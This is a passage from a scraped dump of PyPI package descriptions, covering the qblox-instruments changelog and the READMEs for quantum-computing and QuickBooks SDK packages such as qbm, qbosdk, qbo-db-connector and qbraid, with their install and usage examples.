firmware release.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.11.1.Pulsar QRM: compatible with device firmwarev0.11.1.Cluster: compatible with device firmwarev0.6.1.Note:You can also find this release on Gitlabhere.0.11.0 (27-07-2023)Changelog:Added marker inversion functionality for changing the marker default voltage level.
Previously it defaulted to LOW, but now the user can use the marker inversion parameters to select a default value of HIGH.Made all the SystemStatusFlags more concise.Added the ability for the ADC inputs to be offset.Changed channel map to support real-mode waveform playback and make parameter usage more intuitive.Fixed missing set/get parameters on dummy instrument.Fixed global divide-by-zero settings in numpy, moving them to local scope where possible.API changes:SystemStatusFlags regrouped PLL flags {CARRIER_PLL_UNLOCKED, FPGA_PLL_UNLOCKED, LO_PLL_UNLOCKED} -> {PLL_UNLOCKED}SystemStatusFlags regrouped Temp flags {FPGA_TEMPERATURE_OUT_OF_RANGE, CARRIER_TEMPERATURE_OUT_OF_RANGE, AFE_TEMPERATURE_OUT_OF_RANGE, LO_TEMPERATURE_OUT_OF_RANGE, BACKPLANE_TEMPERATURE_OUT_OF_RANGE} -> {TEMPERATURE_OUT_OF_RANGE}SystemStatusFlags added flag {HARDWARE_COMPONENT_FAILED}QCoDeS parameter added for input offset: {in0_offset_path0, in0_offset_path1, in0_offset, in1_offset}QCoDeS parameter added for marker inversion: {marker0_inv_en, marker1_inv_en, marker2_inv_en, marker3_inv_en}QCoDeS parameters changed for channel map: channel_map_pathX_outY_en -> connect_outXQCoDeS parameters added for real-mode acquisition: {connect_acq_I, connect_acq_Q}Added utility methods for configuring the channel map: {disconnect_outputs, disconnect_inputs, connect_sequencer}Added qblox-cfg describe -j/--json to more explicitly expose the functionality currently only shown when verbosity is increased.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.11.0.Pulsar QRM: compatible with device firmwarev0.11.0.Cluster: compatible with device firmwarev0.6.0.Note:You can also find this release on Gitlabhere.0.10.1 (17-07-2023)Changelog:Added support for new cluster firmware release.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.10.0.Pulsar QRM: compatible with device firmwarev0.10.0.Cluster: compatible with device firmwarev0.5.1.Note:You can also find this release on Gitlabhere.0.10.0 (01-05-2023)Changelog:Changed resolution of the sequencer's real-time timegrid from 4 ns to 1 ns for all real-time instructions, except for the instructions that operate on the NCOs (e.g. set_freq, reset_ph, set_ph, set_ph_delta). For now, the NCO instructions still operate on the 4 ns timegrid.Added the option to control the brightness of the front-panel LEDs. The brightness can be set to four settings: high, medium, low, off.Added a sequencer flag to indicate that input was out-of-range during an acquisition's integration window. Previously, the input out-of-range could only be detected by scope acquisitions. Now all acquisitions are able to detect this.Changed the format with which sequencer and scope configurations are communicated between the instrument and driver to JSON objects as a first step towards improving driver backwards compatibility.Improved handling of acquisitions in the dummy drivers.Added more detail to the HISTORY file.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.10.0.Pulsar QRM: compatible with device firmwarev0.10.0.Cluster: compatible with device firmwarev0.5.0.Note:You can also find this release on Gitlabhere.0.9.0 (28-02-2023)Changelog:Added new feedback functionality to allow sequencer-to-sequencer, module-to-module and Cluster-to-Cluster feedback. To support this, new Q1ASM instructions are added to the instruction set.
The wait_trigger instruction is also\nchanged accordingly with a new address argument.The external trigger input is now also connected to the new trigger network for feedback purposes and must be mapped\nto this network using the associated parameters.QCoDeS parameter name change: discretization_threshold_acq -> thresholded_acq_thresholdQCoDeS parameter name change: phase_rotation_acq -> thresholded_acq_rotationImproved performance of the get_acquisitions method.Fixed ability to exclude sequencer.sequence readout when creating a snapshot through QCoDeS.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.9.0.Pulsar QRM: compatible with device firmwarev0.9.0.Cluster: compatible with device firmwarev0.4.0.Note:You can also find this release on Gitlabhere.0.8.2 (27-01-2023)Changelog:Add compatibility for Cluster release v0.3.1Improved scope mode data handling.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.8.0.Pulsar QRM: compatible with device firmwarev0.8.0.Cluster: compatible with device firmwarev0.3.1.Note:You can also find this release on Gitlabhere.0.8.1 (19-12-2022)Changelog:Removed Read the Docs files from repository and moved it tohttps://gitlab.com/qblox/packages/software/qblox_instruments_docs.Improved performance of the get_acquisitions method.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.8.0.Pulsar QRM: compatible with device firmwarev0.8.0.Cluster: compatible with device firmwarev0.3.0.Note:You can also find this release on Gitlabhere.0.8.0 (09-12-2022)Changelog:Added support for the redesigned NCO.Added support for the NCO phase compensation for propagation delays from output to input path.Increased NCO range from +/-300 MHz to +/-500 MHz.Added support for TTL trigger acqusitions.Improved error handling for sequence retrieval.Added support for attenuation control to dummy modules.Added support to set acquisition data in dummy modules.Updated the assemblers used by the dummy modules.Added and updated test cases for new features.Added NCO control tutorial notebook.Added TTL trigger acquisition tutorial notebook.Improved doc-strings.Updated documentation and tutorials.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.8.0.Pulsar QRM: compatible with device firmwarev0.8.0.Cluster: compatible with device firmwarev0.3.0.Note:You can also find this release on Gitlabhere.0.7.1 (23-01-2023)Changelog:Added support for new firmware release.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.7.3.Pulsar QRM: compatible with device firmwarev0.7.3.Cluster: compatible with device firmwarev0.2.3.Note:You can also find this release on Gitlabhere.0.7.0 (04-08-2022)Changelog:Added command clear acquisition dataSPI Rack driver was updated to always unlock it at startup, not initialize the span by default, change the code for\nchanging the span of the S4g and D5a and ensure no mismatch between the host computer and SPI rack on the span\nvalue before doing a current/voltage set operation.Changed assembler character limit, and add code to strip the sequencer program from comments and unused information.Updated tutorials to make them independent of the device type (ie QRM or QCM) and to divide them in a Pulsar and a\nCluster section.Changed QRM output offset range to 1Vpp.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.7.2.Pulsar QRM: compatible with device firmwarev0.7.2.Cluster: compatible with device firmwarev0.2.2.Note:You can also find this 
release on Gitlabhere.0.6.1 (20-05-2022)Changelog:Added input and output attenuation control for RF-modules.Added the ability to disable LOs in RF-modules.Added a method to manually restart ADC calibration in QRM and QRM-RF modules. Be aware that this is a preliminary\nmethod that might change in the near future.Changed the SPI Rack driver to eliminate unwanted voltage/current jumps by disabling the reset of\nvoltages/currents on initialization and adding checks to prevent the user to set a value outside of the currently\nset span.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.7.1.Pulsar QRM: compatible with device firmwarev0.7.1.Cluster: compatible with device firmwarev0.2.1.Note:You can also find this release on Gitlabhere.0.6.0 (29-03-2022)This release introduces a significant refactor to Qblox Instruments as both a general restructure is introduced\nand the preliminary Cluster driver is replaced by the definitive driver. Unfortunately, this means that this\nrelease also introduces a few breaking changes. In exchange, we believe that this release prepares Qblox Instruments\nfor the future.Changelog:Renamed all classes to be compliant with PEP8\u2019s capswords format.Restructured imports; all drivers are now imported directly fromqblox_instrumentsas follows:from qblox_instruments import Cluster, Pulsar, SpiRackfrom qblox_instruments.qcodes_drivers.spi_rack_modules import D5aModule, S4gModuleWith the new Cluster firmware release, the user now interacts with the Cluster as a single instrument instead\nof a rack of instruments. The new Cluster driver reflects this. It detects where and which modules are in the rack\nand automatically makes them accessible as an InstrumentChannel submodule accessible asCluster.module, wherexis the slot index of the rack.The Pulsar QCM and Pulsar QRM drivers have been combined into a single Pulsar driver that covers the functionality\nof both.The SPI Rack driver driver has been split into a native and QCoDeS layer to improve separation of functionality.Each sequencer\u2019s parameters are now accessible through it\u2019s own InstrumentChannel submodule. This means\nthat parameters are now accessible asmodule.sequencer.parameter, wherexis the sequencer index.Renamedget_system_statustoget_system_stateto be inline with other state method names.The methodsget_system_stateandget_sequencer_statenow return namedtuples of typeSystemStateandSequencerStaterespectively to ease handling of the returned statuses and accompanying flags.Renamed the sequencer\u2019swaveform_and_programsparameter tosequence.The way to configure the driver as a dummy has been changed to use enums for module type selection.Added keep alive pinging to the socket interface to keep the instrument connection from closing after\na platform dependant idle period.Fixed general code duplication problem between instruments.Introducedqblox-cfgas the new configuration management tool with which to update the Cluster and Pulsar\ninstruments. As of Pulsar firmware release v0.7.0 and Cluster firmware release v0.2.0, the configuration\nmanagement tool is no longer shipped with the release, but insteadqblox-cfgmust be used. 
This new tool provides\nfar more functionality and exposes the improved network configurability of the latest firmware releases.On top of the new configuration management tool,qblox-pnpis also instroduced as the new network debug tool.\nThis tool, in combination with the latest firmware releases, allows to easily find instruments in the network and\nto potentially recover them in case of network/IP configuration problems.Improved unit test coverage.Updated the documentation on Read the Docs to reflect the changes.Added various improvements and fixes to the tutorials.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.7.0.Pulsar QRM: compatible with device firmwarev0.7.0.Cluster: compatible with device firmwarev0.2.0.Note:You can also find this release on Gitlabhere.0.5.4 (22-12-2021)Changelog:Cleaned code to improve unit test code coverage.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.6.3.Pulsar QRM: compatible with device firmwarev0.6.3.Cluster CMM: compatible with device firmware v0.1.1.Cluster CMM: compatible with device firmware v0.1.5.Cluster CMM: compatible with device firmware v0.1.5.Note:You can also find this release on Gitlabhere.0.5.3 (26-11-2021)Changelog:Improved __repr__ response from the QCoDeS drivers.Added tutorials for multiplexed sequencing, mixer correction, RF-control and Rabi experiments.Fixed empty acquisition list readout from dummy modules.Added RF-module support to dummy modules.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.6.2.Pulsar QRM: compatible with device firmwarev0.6.2.Cluster CMM: compatible with device firmware v0.1.0.Cluster CMM: compatible with device firmware v0.1.3.Cluster CMM: compatible with device firmware v0.1.3.Note:You can also find this release on Gitlabhere.0.5.2 (11-10-2021)Changelog:Device compatibility update.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.6.2.Pulsar QRM: compatible with device firmwarev0.6.2.Cluster CMM: compatible with device firmware v0.1.0.Cluster CMM: compatible with device firmware v0.1.3.Cluster CMM: compatible with device firmware v0.1.3.Note:You can also find this release on Gitlabhere.0.5.1 (07-10-2021)Changelog:Device compatibility update.Added channel map functionality to dummy layer.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.6.1.Pulsar QRM: compatible with device firmwarev0.6.1.Cluster CMM: compatible with device firmware v0.1.0.Cluster CMM: compatible with device firmware v0.1.2.Cluster CMM: compatible with device firmware v0.1.2.Note:You can also find this release on Gitlabhere.0.5.0 (05-10-2021)Changelog:Increased sequencer support to 6 sequencers per instrument.Added support for real-time mixer correction.Renamed Pulsar QRM input gain parameters to be inline with output offset parameter names.Updated the assemblers for the Pulsar QCM and QRM dummy drivers to support the phase reset instruction.Added preliminary driver for the Cluster.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.6.0.Pulsar QRM: compatible with device firmwarev0.6.0.Cluster CMM: compatible with device firmware v0.1.0.Cluster CMM: compatible with device firmware v0.1.1.Cluster CMM: compatible with device firmware v0.1.1.Note:You can also find this release on Gitlabhere.0.4.0 (21-07-2021)Changelog:Changed initial Pulsar QCM and QRM device instantiation timeout from 60 seconds to 3 seconds.Added support for the new Pulsar QRM acquisition path functionalities (i.e. 
real-time demodulation, integration, discretization, averaging, binning).Updated the assemblers for the Pulsar QCM and QRM dummy drivers.Switched from using a custom function to using functools in the QCoDeS parameters.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.5.2.Pulsar QRM: compatible with device firmwarev0.5.0.Note:You can also find this release on Gitlabhere.0.3.2 (21-04-2021)Changelog:Added QCoDeS driver for D5A SPI-rack module.Updated documentation on ReadTheDocs.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.5.1.Pulsar QRM: compatible with device firmwarev0.4.1.Note:You can also find this release on Gitlabhere.0.3.1 (09-04-2021)Changelog:Device compatibility update.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.5.1.Pulsar QRM: compatible with device firmwarev0.4.1.Note:You can also find this release on Gitlabhere.0.3.0 (25-03-2021)Changelog:Added preliminary internal LO support for development purposes.Added support for Pulsar QCM\u2019s output offset DACs.Made IDN fields IEEE488.2 compliant.Added SPI-rack QCoDeS drivers.Fixed sequencer offset instruction in dummy assemblers.Changed acquisition out-of-range result implementation from per sample basis to per acquisition basis.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.5.0.Pulsar QRM: compatible with device firmwarev0.4.0.Note:You can also find this release on Gitlabhere.0.2.3 (03-03-2021)Changelog:Small improvements to tutorials.Small improvements to doc strings.Socket timeout is now set to 60s to fix timeout issues.The get_sequencer_state and get_acquisition_state functions now express their timeout in minutes iso seconds.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.4.0.Pulsar QRM: compatible with device firmwarev0.3.0.Note:You can also find this release on Gitlabhere.0.2.2 (25-01-2021)Changelog:Improved documentation on ReadTheDocs.Added tutorials to ReadTheDocs.Fixed bugs in Pulsar dummy classes.Fixed missing arguments on some function calls.Cleaned code after static analysis.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.4.0.Pulsar QRM: compatible with device firmwarev0.3.0.Note:You can also find this release on Gitlabhere.0.2.1 (01-12-2020)Changelog:Fixed get_awg_waveforms for Pulsar QCM.Renamed get_acquisition_status to get_acquisition_state.Added optional blocking behaviour and timeout to get_sequencer_state.Corrected documentation on Read The Docs.Added value mapping for reference_source and trigger mode parameters.Improved readability of version mismatch.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.4.0.Pulsar QRM: compatible with device firmwarev0.3.0.Note:You can also find this release on Gitlabhere.0.2.0 (21-11-2020)Changelog:Added support for floating point temperature readout.Renamed QCoDeS parameter sequencer#_nco_phase to sequencer#_nco_phase_offs.Added support for Pulsar QCM input gain control.Significantly improved documentation on Read The Docs.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.4.0.Pulsar QRM: compatible with device firmwarev0.3.0.Note:You can also find this release on Gitlabhere.0.1.2 (22-10-2020)Changelog:Fixed Windows assembler for dummy PulsarFixed MacOS assembler for dummy PulsarDriver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.3.0.Pulsar QRM: compatible with device firmwarev0.2.0.Note:You can also find this release on 
Gitlabhere.0.1.1 (05-10-2020)Changelog:First release on PyPIDriver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.3.0.Pulsar QRM: compatible with device firmwarev0.2.0.Note:You can also find this release on Gitlabhere."} +{"package": "qbm", "pacakge-description": "Quantum Boltzmann MachinesTheqbmPython package is designed for training and analyzing quantum Boltzmann machines (QBMs) using either a simulation or a D-Wave quantum annealer.\nThe QBM implemented here is based on the work inQuantum Boltzman Machineby Amin et al.[1].\nThis package originated as part of the thesisQuantum Boltzmann Machines: Applications in Quantitative Finance.Table of ContentsInstallationConda EnvironmentUsageBasic ConfigurationBQRBM ModelInstantiationTrainingSamplingSaving and LoadingExampleReferencesInstallationTheqbmpackage can be installed withpip install qbmUsageBasic ConfigurationTheqbmpackage is mainly configured around the project directory, which can be set with theQBM_PROJECT_DIRenvironment variable.\nOnce the environment variable is set one can use theqbm.utils.get_project_dir()function to get a path object to the directory.BQRBM ModelThe BQRBM, or bound-based quantum restricted Boltzmann machine, is a quantum Boltzmann machine that has intra-layer restrictions and is trained via maximization of the log-likelihood lower bound.\nThe model currently only has the ability to train in the specific case wheres_freeze = 1, i.e., when it reduces to a classical RBM trained with quantum assistance, because estimating the effective inverse temperature is nontrivial for the general case.All of the arguments to the methods below are further explained in their respective docstrings.InstantiationA BQRBM model can be instantiated as (for example)model = BQRBM(\n V_train,\n n_hidden,\n A_freeze,\n B_freeze,\n beta_initial=1.0,\n simulation_params={\"beta\": 1.0},\n seed=0,\n)One needs to choose whether or not they want to train a model using a simulation or an annealer, and this is done by passing eithersimulation_paramsorannealer_params.\nWhichever is passed decides how the model is trained.TrainingThe model can be trained by runningmodel.train(\n n_epochs=100,\n learning_rate=1e-1,\n learning_rate_beta=1e-1,\n mini_batch_size=10,\n n_samples=10_000,\n callback=None,\n)SamplingThe model can generate samples by runningmodel.sample(\n n_samples,\n answer_mode=\"raw\",\n use_gauge=True,\n binary=False,\n)Saving and LoadingThe model can be saved withmodel.save(\"/path/to/model.pkl\")and loaded again withmodel = BQRBM.load(\"/path/to/model.pkl\")ExampleAn example notebook can be foundhereReferences[1]Mohammad H. Amin et al. \u201cQuantum Boltzmann Machine\u201d. In: Phys. Rev. X 8 (2 May 2018), p. 021050. doi: 10.1103/PhysRevX.8.021050. 
url:https://link.aps.org/doi/10.1103/PhysRevX.8.021050."} +{"package": "qbodbc", "pacakge-description": "qbodbcConnect to your QuickBooks desktop instance with Python.ConnectingThe application server, and the QuickBooks instance must be on\nthe same machine or have QODBC driver and QRemote running\non the QuickBooks application box.The alternative is to run middleware in front of the QuickBooks\ninstnace that can deserialize and process incoming qbodbc objects."} +{"package": "qbo-db-connector", "pacakge-description": "Quickbooks Online Database ConnectorConnects Quickbooks online to a database to transfer information to and fro.InstallationThis project requiresPython 3+.Download this project and use it (copy it in your project, etc).Install it frompip.$ pip install qbo-db-connectorUsageTo use this connector you'll need these Quickbooks credentials used for OAuth2 authentication:client ID,client secretandrefresh token.This connector is very easy to use.importloggingimportsqlite3fromqbosdkimportQuickbooksOnlineSDKfromqbo_db_connectorimportQuickbooksExtractConnector,QuickbooksLoadConnectordbconn=sqlite3.connect('/tmp/temp.db')logger=logging.getLogger('Quickbooks usage')logging.basicConfig(format='%(asctime)s%(name)s:%(message)s',level=logging.INFO,handlers=[logging.StreamHandler()])quickbooks_config={'client_id':'','client_secret':'','realm_id':'','refresh_token':'','environment':'',}logger.info('Quickbooks db connector usage')connection=QuickbooksOnlineSDK(client_id=quickbooks_config['client_id'],client_secret=quickbooks_config['client_secret'],refresh_token=quickbooks_config['refresh_token'],realm_id=quickbooks_config['realm_id'],environment=quickbooks_config['environment'])quickbooks_extract=QuickbooksExtractConnector(qbo_connection=connection,dbconn=dbconn)quickbooks_load=QuickbooksLoadConnector(qbo_connection=connection,dbconn=dbconn)# make sure you save the updated refresh tokenrefresh_token=connection.refresh_token# extractingquickbooks_extract.extract_employees()quickbooks_extract.extract_accounts()quickbooks_extract.extract_classes()quickbooks_extract.extract_departments()quickbooks_extract.extract_home_currency()quickbooks_extract.extract_exchange_rates()# loadingquickbooks_load.load_check(check_id='100')quickbooks_load.load_journal_entry(journal_entry_id='800')quickbooks_load.load_attachments(ref_id='100',ref_type='Purchase')ContributeTo contribute to this project follow the stepsFork and clone the repository.Runpip install -r requirements.txtSetup pylint precommit hookCreate a file.git/hooks/pre-commitCopy and paste the following lines in the file -#!/usr/bin/env bashgit-pylint-commit-hookRunchmod +x .git/hooks/pre-commitMake necessary changesRun unit tests to ensure everything is fineUnit TestsTo run unit tests, run pytest in the following manner:python -m pytest test/unitYou should see something like this:================================================================== test session starts ==================================================================\n-------------------------------------------------------------------------------------------------------------------------------- live log call ---------------------------------------------------------------------------------------------------------------------------------\n2019-12-24 12:10:46 [ INFO] test.unit.test_mocks: Testing mock data (test_mocks.py:18)\nPASSED [ 
69%]\ntest/unit/test_mocks.py::test_dbconn_mock_setup\n-------------------------------------------------------------------------------------------------------------------------------- live log call ---------------------------------------------------------------------------------------------------------------------------------\n2019-12-24 12:10:46 [ INFO] test.unit.test_mocks: Testing mock dbconn (test_mocks.py:29)\nPASSED [ 76%]\ntest/unit/test_mocks.py::test_qec_mock_setup [100%]\n\n=================================================================== 3 passed in 0.10s ===================================================================Integration TestsTo run integration tests, you will need a mechanism to connect to a real qbo account. Save this info in a test_credentials.json file in your root directory:{\"client_id\":\"\",\"client_secret\":\"\",\"realm_id\":\"\",\"refresh_token\":\"\",\"environment\":\"\"}Code coverageTo get code coverage report, run this command:----------coverage:platformdarwin,python3.7.4-final-0-----------\nNameStmtsMissCover\n--------------------------------------------------\nqbo_db_connector/__init__.py20100%\nqbo_db_connector/extract.py79396%\nqbo_db_connector/load.py71987%\n--------------------------------------------------\nTOTAL1521292%To get an html report, run this command:python-mpytest--cov=qbo_db_connector--cov-reporthtml:cov_htmlWe want to maintain code coverage of more than 90% for this project at all times.Please note that maintaining a score of 10 is important as the CI pylint action fails when a pull request is openedLicenseThis project is licensed under the MIT License - see theLICENSEfile for details"} +{"package": "qbosdk", "pacakge-description": "QuickbooksOnlineSDKPython SDK for accessing QBO APIs.InstallationThis project requiresPython 3+andRequestslibrary (pip install requests).Download this project and use it (copy it in your project, etc).Install it frompip.$ pip install qbosdkUsageTo use this SDK you'll need these QBO credentials used for OAuth2 authentication:client ID,client secretandrefresh token.This SDK is very easy to use.First you'll need to create a connection using the main class QuickbooksOnlineSDK.fromqbosdkimportQuickbooksOnlineSDKconnection=QuickbooksOnlineSDK(client_id='',client_secret='',refresh_token='',realm_id='',environment='')After that you'll be able to access any of the API classes\"\"\"USAGE: ..()\"\"\"# Get a list of all Employees (with all available details for Employee)response=connection.employees.get()# Get a list of all Accountsresponse=connection.accounts.get()See more details about the usage into the wiki pages of this project.Integration TestsTo run integration tests, you will need a mechanism to connect to a real qbo account. 
Save this info in a test_credentials.json file in your root directory:{\"client_id\":\"\",\"client_secret\":\"\",\"realm_id\":\"\",\"refresh_token\":\"\",\"environment\":\"\"}$pipinstallpytest\n\n$python-mpytesttest/integrationLicenseThis project is licensed under the MIT License - see theLICENSEfile for details"} +{"package": "qbox", "pacakge-description": "FeaturesTODORequirementsTODOInstallationYou can installQuantum BoxviapipfromPyPI:$pipinstallqboxUsagePlease see theCommand-line Referencefor details.ContributingContributions are very welcome.\nTo learn more, see theContributor Guide.LicenseDistributed under the terms of theMIT license,Quantum Boxis free and open source software.IssuesIf you encounter any problems,\npleasefile an issuealong with a detailed description.CreditsThis project was generated from@cjolowicz\u2019sHypermodern Python Cookiecuttertemplate."} +{"package": "qb_penTester", "pacakge-description": "No description available on PyPI."} +{"package": "qbpy", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qbraid", "pacakge-description": "The qBraid-SDK is a Python toolkit for cross-framework abstraction,\ntranspilation, and execution of quantum programs.FeaturesUnified quantum frontend interface.Transpilequantum circuits between\nsupported packages. Leverage the capabilities of multiple frontends throughsimple, consistent protocols.Build once, target many.Createquantum programs using your preferred\ncircuit-building package, andexecuteon any backend that interfaces with\na supported frontend.Benchmark, compare, interpret results. Built-incompatiblepost-processing\nenables comparing results between runs andacross backends.Installation & SetupFor the best experience, install the qBraid-SDK environment onlab.qbraid.com. Login (orcreate an account) and follow the steps toinstall an environment.Using the SDK on qBraid Lab means direct, pre-configured access to allAmazon Braket supported deviceswith no additional access keys or API tokens required. SeeqBraid Quantum Jobsfor more.Local installThe qBraid-SDK, and all of its dependencies, can also be installed using pip:pipinstallqbraidYou can alsoinstall from sourceby cloning this repository and running a pip install command in the root directory of the repository:gitclonehttps://github.com/qBraid/qBraid.gitcdqBraid\npipinstall-e'.[all]'Note: The qBraid-SDK requires Python 3.9 or greater.If using locally, follow linked instructions to configure yourqBraid,AWS,\nandIBMQcredentials.Check versionYou can view the version of the qBraid-SDK you have installed within Python using the following:In[1]:importqbraidIn[2]:qbraid.__version__Documentation & TutorialsqBraid documentation is available atdocs.qbraid.com.See also:API ReferenceUser GuideExample NotebooksQuickstartTranspilerConstruct a quantum program of any supported program type.Below,SUPPORTED_QPROGRAMSmaps shorthand identifiers for supported quantum programs, each corresponding to a type in the typedQPROGRAMUnion.\nFor example, 'qiskit' maps toqiskit.QuantumCircuitinQPROGRAM. 
Notably, 'qasm2' and 'qasm3' both represent raw OpenQASM strings.\nThis arrangement simplifies targeting and transpiling between different quantum programming frameworks.>>>fromqbraidimportSUPPORTED_QPROGRAMS>>>SUPPORTED_QPROGRAMS{'cirq':'cirq.circuits.circuit.Circuit','qiskit':'qiskit.circuit.quantumcircuit.QuantumCircuit','pyquil':'pyquil.quil.Program','pytket':'pytket._tket.circuit.Circuit','braket':'braket.circuits.circuit.Circuit','openqasm3':'openqasm3.ast.Program','qasm2':'str','qasm3':'str'}Pass any quantum program of typeqbraid.QPROGRAMto thecircuit_wrapper()and specify a target package\nfromSUPPORTED_QPROGRAMSto \"transpile\" your circuit to a new program type:>>>fromqbraidimportcircuit_wrapper>>>fromqbraid.interfaceimportrandom_circuit>>>qiskit_circuit=random_circuit(\"qiskit\")>>>cirq_circuit=circuit_wrapper(qiskit_circuit).transpile(\"cirq\")>>>print(qiskit_circuit)\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510q_0:\u2500\u2500\u25a0\u2500\u2500\u2524Rx(3.0353)\u251c\u250c\u2500\u2534\u2500\u2510\u2514\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2518q_1:\u2524H\u251c\u2500\u2500\u2500\u2500\u2524\u221aX\u251c\u2500\u2500\u2500\u2500\u2514\u2500\u2500\u2500\u2518\u2514\u2500\u2500\u2500\u2500\u2518>>>print(cirq_circuit)0:\u2500\u2500\u2500@\u2500\u2500\u2500Rx(0.966\u03c0)\u2500\u2500\u2500\u25021:\u2500\u2500\u2500H\u2500\u2500\u2500X^0.5\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500The same functionality can be achieved using the underlyingconvert_to_package()function directly:>>>fromqbraidimportconvert_to_package>>>cirq_circuit=convert_to_package(qiskit_circuit,\"cirq\")Behind the scenes, the qBraid-SDK usesnetworkxto create a directional graph that maps all possible conversions between supported program types:fromqbraid.transpilerimportConversionGraphfromqbraid.visualizationimportplot_conversion_graphgraph=ConversionGraph()plot_conversion_graph(graph)You can use the native conversions supported by qBraid, or define your own custom nodes and/or edges. 
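As a further illustration of the native conversions, the short sketch below chains convert_to_package() through two of the program types listed in SUPPORTED_QPROGRAMS; it uses only the functions already shown above, though this particular round trip is an assumption and has not been verified here.
from qbraid import convert_to_package
from qbraid.interface import random_circuit

# Start from a Qiskit circuit and hop across two supported program types
qiskit_circuit = random_circuit("qiskit")
qasm3_str = convert_to_package(qiskit_circuit, "qasm3")   # Qiskit -> OpenQASM 3 string
braket_circuit = convert_to_package(qasm3_str, "braket")  # OpenQASM 3 -> Braket circuit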
Seeexample.Devices & JobsSearch for quantum backend(s) on which to execute your program.>>>fromqbraidimportget_devices>>>get_devices()Devicestatusupdated0minutesagoDeviceIDStatus---------------aws_oqc_lucyONLINEaws_ionq_aria2OFFLINEaws_rigetti_aspen_m3ONLINEibm_q_brisbaneONLINE...Apply thedevice_wrapper(), and send quantum jobs to any supported backend,\nfrom any supported program type:>>>fromqbraidimportdevice_wrapper,get_jobs>>>aws_device=device_wrapper(\"aws_oqc_lucy\")>>>ibm_device=device_wrapper(\"ibm_q_brisbane\")>>>aws_job=aws_device.run(qiskit_circuit,shots=1000)>>>ibm_job=ibm_device.run(cirq_circuit,shots=1000)>>>get_jobs()Displaying2mostrecentjobs:JobIDSubmittedStatus---------------------aws_oqc_lucy-exampleuser-qjob-zzzzzzz...2023-05-21T21:13:47.220ZQUEUEDibm_q_brisbane-exampleuser-qjob-xxxxxxx...2023-05-21T21:13:48.220ZRUNNING...Compare results in a consistent, unified format:>>>aws_result=aws_job.result()>>>ibm_result=ibm_job.result()>>>aws_result.measurement_counts(){'00':483,'01':14,'10':486,'11':17}>>>ibm_result.measurement_counts(){'00':496,'01':12,'10':479,'11':13}Local account setupTo use the qBraid-SDK locally (outside of qBraid Lab), you must add your account\ncredentials:Create a qBraid account or log in to your existing account by visitingaccount.qbraid.comCopy your API Key token from the left side of\nyouraccount page:Save your API key from step 2 by callingQbraidSession.save_config():fromqbraid.apiimportQbraidSessionsession=QbraidSession(api_key='API_KEY')session.save_config()The command above stores your credentials locally in a configuration file~/.qbraid/qbraidrc,\nwhere~corresponds to your home ($HOME) directory. Once saved, you can then connect to the\nqBraid API and leverage functions such asget_devices()andget_jobs().Load Account from Environment VariablesAlternatively, the qBraid-SDK can discover credentials from environment\nvariables:exportJUPYTERHUB_USER='USER_EMAIL'exportQBRAID_API_KEY='QBRAID_API_KEY'Then instantiate the session without any argumentsfromqbraid.apiimportQbraidSessionsession=QbraidSession()Launch on qBraidThe \"Launch on qBraid\" button (below) can be added to any public GitHub\nrepository. Clicking on it automaically opens qBraid Lab, and performs agit cloneof the project repo into your account's home directory. Copy the\ncode below, and replaceYOUR-USERNAMEandYOUR-REPOSITORYwith your GitHub\ninfo.Use the badge in your project'sREADME.md:[](https://account.qbraid.com?gitHubUrl=https://github.com/YOUR-USERNAME/YOUR-REPOSITORY.git)Use the badge in your project'sREADME.rst:..image::https://qbraid-static.s3.amazonaws.com/logos/Launch_on_qBraid_white.png:target:https://account.qbraid.com?gitHubUrl=https://github.com/YOUR-USERNAME/YOUR-REPOSITORY.git:width:150pxContributingInterested in contributing code, or making a PR? SeeCONTRIBUTING.mdFor feature requests and bug reports:Submit an issueFor discussions, and specific questions about the qBraid SDK, qBraid Lab, or\nother topics,join our discord communityFor questions that are more suited for a forum, post toQuantum Computing Stack Exchangewith theqbraidtag.Want your open-source project featured as its own runtime environment on\nqBraid Lab? Fill out ourNew Environment Request FormLicenseGNU General Public License v3.0"} +{"package": "qbraid-cli", "pacakge-description": "Command Line Interface for interacting with all parts of the qBraid platform.TheqBraid CLIis a specialized command-line interface tool designedexclusivelyfor use within theqBraid Labplatform. 
